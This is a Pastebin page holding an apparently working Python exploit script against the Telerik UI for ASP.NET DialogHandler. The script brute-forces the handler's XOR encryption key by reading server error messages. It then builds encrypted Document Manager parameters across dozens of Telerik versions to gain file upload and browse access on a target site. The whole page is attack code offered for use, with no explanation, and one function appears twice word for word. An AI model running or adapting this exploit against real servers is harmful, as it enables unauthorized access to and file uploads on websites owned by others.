API tools faq
paste
Advertisement
Misbahulkeri

Untitled

Misbahulkeri
Dec 13th, 2019
247
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.42 KB | None | 0 0
raw download clone embed print report
  1. import sys
  2. import base64
  3. import requests
  4. import re
  5. import os
  6. from platform import system
  7. import binascii
  8. from time import time as timer
  9. from requests.packages.urllib3.exceptions import InsecureRequestWarning
  10.  
  11. requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
  12.  
  13. requests_sent = 0
  14. char_requests = 0
  15.  
  16.  
  17. def get_result(plaintext, key, session, pad_chars):
  18. global requests_sent, char_requests
  19.  
  20. url = sys.argv[2]
  21. base_pad = (len(key) % 4)
  22. base = '' if base_pad == 0 else pad_chars[0:4 - base_pad]
  23. dp_encrypted = base64.b64encode(
  24. (encrypt(plaintext, key) + base).encode()
  25. ).decode()
  26. request = requests.Request('GET', url + '?dp=' + dp_encrypted)
  27. request = request.prepare()
  28. response = session.send(request, verify=False)
  29. requests_sent += 1
  30. char_requests += 1
  31.  
  32. match = re.search("(Error Message:)(.+\n*.+)(</div>)", response.text)
  33. return True \
  34. if match is not None \
  35. and match.group(2) == "Index was outside the bounds of the array." \
  36. else False
  37.  
  38.  
  39. def test_keychar(keychar, found, session, pad_chars):
  40. base64chars = [
  41. "A", "Q", "g", "w", "B", "R", "h", "x", "C", "S", "i", "y",
  42. "D", "T", "j", "z", "E", "U", "k", "0", "F", "V", "l", "1",
  43. "G", "W", "m", "2", "H", "X", "n", "3", "I", "Y", "o", "4",
  44. "J", "Z", "p", "5", "K", "a", "q", "6", "L", "b", "r", "7",
  45. "M", "c", "s", "8", "N", "d", "t", "9", "O", "e", "u", "+",
  46. "P", "f", "v", "/"
  47. ]
  48.  
  49. duff = False
  50. accuracy_thoroughness_threshold = sys.argv[5]
  51. for bc in range(int(accuracy_thoroughness_threshold)):
  52. # ^^ max is len(base64chars)
  53. sys.stdout.write("\b\b" + base64chars[bc] + "]")
  54. sys.stdout.flush()
  55. if not get_result(
  56. base64chars[0] * len(found) + base64chars[bc],
  57. found + keychar, session, pad_chars
  58. ):
  59. duff = True
  60. break
  61. return False if duff else True
  62.  
  63.  
  64. def encrypt(dpdata, key):
  65. encrypted = []
  66. k = 0
  67. for i in range(len(dpdata)):
  68. encrypted.append(chr(ord(dpdata[i]) ^ ord(key[k])))
  69. k = 0 if k >= len(key) - 1 else k + 1
  70. return ''.join(str(e) for e in encrypted)
  71.  
  72.  
  73.  
  74. def test_keypos(key_charset, unprintable, found, session):
  75. pad_chars = ''
  76. for pad_char in range(256):
  77. pad_chars += chr(pad_char)
  78.  
  79. for i in range(len(pad_chars)):
  80. for k in range(len(key_charset)):
  81. keychar = key_charset[k]
  82. sys.stdout.write("\b"*6)
  83. sys.stdout.write(
  84. (
  85. keychar
  86. if unprintable is False
  87. else '+'
  88. ) +
  89. ") [" + (
  90. keychar
  91. if unprintable is False
  92. else '+'
  93. ) +
  94. "]"
  95. )
  96. sys.stdout.flush()
  97. if test_keychar(keychar, found, session, pad_chars[i] * 3):
  98. return keychar
  99. return False
  100.  
  101.  
  102. def get_key(session):
  103. global char_requests
  104. found = ''
  105. unprintable = False
  106.  
  107. key_length = sys.argv[3]
  108. key_charset = sys.argv[4]
  109. if key_charset == 'all':
  110. unprintable = True
  111. key_charset = ''
  112. for i in range(256):
  113. key_charset += chr(i)
  114. else:
  115. if key_charset == 'hex':
  116. key_charset = '01234567890ABCDEF'
  117.  
  118. print("Attacking " + sys.argv[2])
  119. print(
  120. "to find key of length [" +
  121. str(key_length) +
  122. "] with accuracy threshold [" +
  123. sys.argv[5] +
  124. "]"
  125. )
  126. print(
  127. "using key charset [" +
  128. (
  129. key_charset
  130. if unprintable is False
  131. else '- all ASCII -'
  132. ) +
  133. "]\n"
  134. )
  135. for i in range(int(key_length)):
  136. pos_str = (
  137. str(i + 1)
  138. if i > 8
  139. else "0" + str(i + 1)
  140. )
  141. sys.stdout.write("Key position " + pos_str + ": (------")
  142. sys.stdout.flush()
  143. keychar = test_keypos(key_charset, unprintable, found, session)
  144. if keychar is not False:
  145. found = found + keychar
  146. sys.stdout.write(
  147. "\b"*7 + "{" +
  148. (
  149. keychar
  150. if unprintable is False
  151. else '0x' + binascii.hexlify(keychar.encode()).decode()
  152. ) +
  153. "} found with " +
  154. str(char_requests) +
  155. " requests, total so far: " +
  156. str(requests_sent) +
  157. "\n"
  158. )
  159. sys.stdout.flush()
  160. char_requests = 0
  161. else:
  162. sys.stdout.write("\b"*7 + "Not found, quitting\n")
  163. sys.stdout.flush()
  164. break
  165. if keychar is not False:
  166. print("Found key: " +
  167. (
  168. found
  169. if unprintable is False
  170. else "(hex) " + binascii.hexlify(found.encode()).decode()
  171. )
  172. )
  173. print("Total web requests: " + str(requests_sent))
  174. return found
  175.  
  176. def get_key(session):
  177. global char_requests
  178. found = ''
  179. unprintable = False
  180.  
  181. key_length = sys.argv[3]
  182. key_charset = sys.argv[4]
  183. if key_charset == 'all':
  184. unprintable = True
  185. key_charset = ''
  186. for i in range(256):
  187. key_charset += chr(i)
  188. else:
  189. if key_charset == 'hex':
  190. key_charset = '01234567890ABCDEF'
  191.  
  192. print("Attacking " + sys.argv[2])
  193. print(
  194. "to find key of length [" +
  195. str(key_length) +
  196. "] with accuracy threshold [" +
  197. sys.argv[5] +
  198. "]"
  199. )
  200. print(
  201. "using key charset [" +
  202. (
  203. key_charset
  204. if unprintable is False
  205. else '- all ASCII -'
  206. ) +
  207. "]\n"
  208. )
  209. for i in range(int(key_length)):
  210. pos_str = (
  211. str(i + 1)
  212. if i > 8
  213. else "0" + str(i + 1)
  214. )
  215. sys.stdout.write("Key position " + pos_str + ": (------")
  216. sys.stdout.flush()
  217. keychar = test_keypos(key_charset, unprintable, found, session)
  218. if keychar is not False:
  219. found = found + keychar
  220. sys.stdout.write(
  221. "\b"*7 + "{" +
  222. (
  223. keychar
  224. if unprintable is False
  225. else '0x' + binascii.hexlify(keychar.encode()).decode()
  226. ) +
  227. "} found with " +
  228. str(char_requests) +
  229. " requests, total so far: " +
  230. str(requests_sent) +
  231. "\n"
  232. )
  233. sys.stdout.flush()
  234. char_requests = 0
  235. else:
  236. sys.stdout.write("\b"*7 + "Not found, quitting\n")
  237. sys.stdout.flush()
  238. break
  239. if keychar is not False:
  240. print("Found key: " +
  241. (
  242. found
  243. if unprintable is False
  244. else "(hex) " + binascii.hexlify(found.encode()).decode()
  245. )
  246. )
  247. print("Total web requests: " + str(requests_sent))
  248. return found
  249.  
  250.  
  251. def mode_brutekey():
  252. session = requests.Session()
  253. found = get_key(session)
  254.  
  255. if found == '':
  256. return
  257. else:
  258. urls = {}
  259. url_path = sys.argv[2]
  260. params = (
  261. '?DialogName=DocumentManager' +
  262. '&renderMode=2' +
  263. '&Skin=Default' +
  264. '&Title=Document%20Manager' +
  265. '&dpptn=' +
  266. '&isRtl=false' +
  267. '&dp='
  268. )
  269. versions = [
  270. '2007.1423', '2007.1521', '2007.1626', '2007.2918',
  271. '2007.21010', '2007.21107', '2007.31218', '2007.31314',
  272. '2007.31425', '2008.1415', '2008.1515', '2008.1619',
  273. '2008.2723', '2008.2826', '2008.21001', '2008.31105',
  274. '2008.31125', '2008.31314', '2009.1311', '2009.1402',
  275. '2009.1527', '2009.2701', '2009.2826', '2009.31103',
  276. '2009.31208', '2009.31314', '2010.1309', '2010.1415',
  277. '2010.1519', '2010.2713', '2010.2826', '2010.2929',
  278. '2010.31109', '2010.31215', '2010.31317', '2011.1315',
  279. '2011.1413', '2011.1519', '2011.2712', '2011.2915',
  280. '2011.31115', '2011.3.1305', '2012.1.215', '2012.1.411',
  281. '2012.2.607', '2012.2.724', '2012.2.912', '2012.3.1016',
  282. '2012.3.1205', '2012.3.1308', '2013.1.220', '2013.1.403',
  283. '2013.1.417', '2013.2.611', '2013.2.717', '2013.3.1015',
  284. '2013.3.1114', '2013.3.1324', '2014.1.225', '2014.1.403',
  285. '2014.2.618', '2014.2.724', '2014.3.1024', '2015.1.204',
  286. '2015.1.225', '2015.1.401', '2015.2.604', '2015.2.623',
  287. '2015.2.729', '2015.2.826', '2015.3.930', '2015.3.1111',
  288. '2016.1.113', '2016.1.225', '2016.2.504', '2016.2.607',
  289. '2016.3.914', '2016.3.1018', '2016.3.1027', '2017.1.118',
  290. '2017.1.228', '2017.2.503', '2017.2.621', '2017.2.711',
  291. '2017.3.913'
  292. ]
  293.  
  294. plaintext1 = 'EnableAsyncUpload,False,3,True;DeletePaths,True,0,Zmc9PSxmZz09;EnableEmbeddedBaseStylesheet,False,3,True;RenderMode,False,2,2;UploadPaths,True,0,Zmc9PQo=;SearchPatterns,True,0,S2k0cQ==;EnableEmbeddedSkins,False,3,True;MaxUploadFileSize,False,1,204800;LocalizationPath,False,0,;FileBrowserContentProviderTypeName,False,0,;ViewPaths,True,0,Zmc9PQo=;IsSkinTouch,False,3,False;ExternalDialogsPath,False,0,;Language,False,0,ZW4tVVM=;Telerik.DialogDefinition.DialogTypeName,False,0,'
  295. plaintext2_raw1 = 'Telerik.Web.UI.Editor.DialogControls.DocumentManagerDialog, Telerik.Web.UI, Version='
  296. plaintext2_raw3 = ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
  297. plaintext3 = ';AllowMultipleSelection,False,3,False'
  298.  
  299. for version in versions:
  300. plaintext2_raw2 = version
  301. plaintext2 = base64.b64encode(
  302. (plaintext2_raw1 +
  303. plaintext2_raw2 +
  304. plaintext2_raw3
  305. ).encode()
  306. ).decode()
  307. plaintext = plaintext1 + plaintext2 + plaintext3
  308. plaintext = base64.b64encode(
  309. plaintext.encode()
  310. ).decode()
  311. ciphertext = base64.b64encode(
  312. encrypt(
  313. plaintext,
  314. found
  315. ).encode()
  316. ).decode()
  317. full_url = url_path + params + ciphertext
  318. urls[version] = full_url
  319.  
  320. found_valid_version = False
  321. for version in urls:
  322. url = urls[version]
  323. request = requests.Request('GET', url)
  324. request = request.prepare()
  325. response = session.send(request, verify=False)
  326. if response.status_code == 500:
  327. continue
  328. else:
  329. match = re.search(
  330. "(Error Message:)(.+\n*.+)(</div>)",
  331. response.text
  332. )
  333. if match is None:
  334. print(version + ": " + url)
  335. found_valid_version = True
  336. break
  337.  
  338. if not found_valid_version:
  339. print("No valid version found")
  340.  
  341.  
  342. def mode_help():
  343. print("")
  344.  
  345.  
  346.  
  347.  
  348.  
  349. if system() == 'Linux':
  350. os.system('clear')
  351.  
  352.  
  353.  
  354. if len(sys.argv) < 2:
  355. mode_help()
  356.  
  357. elif sys.argv[1] == "-exploit" and len(sys.argv) == 6:
  358. mode_brutekey()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!